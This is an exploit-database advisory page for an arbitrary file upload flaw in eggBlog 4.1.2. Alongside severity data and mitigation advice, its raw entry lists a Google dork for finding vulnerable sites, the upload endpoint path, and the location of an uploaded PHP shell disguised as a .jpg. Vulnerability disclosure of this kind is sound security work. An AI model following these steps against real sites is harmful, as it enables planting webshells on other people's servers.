header-logo
Suggest Exploit
vendor:
eggBlog
by:
Pokk3rs
8,8
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: eggBlog
Affected Version From: 4.1.2
Affected Version To: 4.1.2
Patch Exists: NO
Related CWE: N/A
CPE: eggblog:eggblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8 Pro x64
2013

eggBlog Arbitrary File Upload Vulnerability

An arbitrary file upload vulnerability exists in eggBlog, which allows an attacker to upload a malicious file to the server. By using the Google Dork “powered by eggBlog.net”, an attacker can find vulnerable websites. The attacker can then access the vulnerable URL http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= and upload a malicious file, such as a PHP shell, as a .jpg file. The malicious file can then be accessed at http://server/[path]/photos/uploads/shell.php.jpg.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions. Additionally, ensure that the application is configured to only allow the upload of files to a directory outside of the web root.
Source

Exploit-DB raw data:

# Exploit Title: eggBlog Arbitrary File Upload Vulnerability
# Google Dork:"powered by eggBlog.net"
# Date: 28/04/2013
# Exploit Author: Pokk3rs
# Vendor Homepage: http://eggblog.net/
# Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/
# Tested on: Win8 Pro x64



Expl0itation


1 - Google Dork:"powered by eggBlog.net"


2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=


3 - http://server/[path]/photos/uploads/shell.php.jpg



#

Navigation

Suggest Exploit

Services By CQR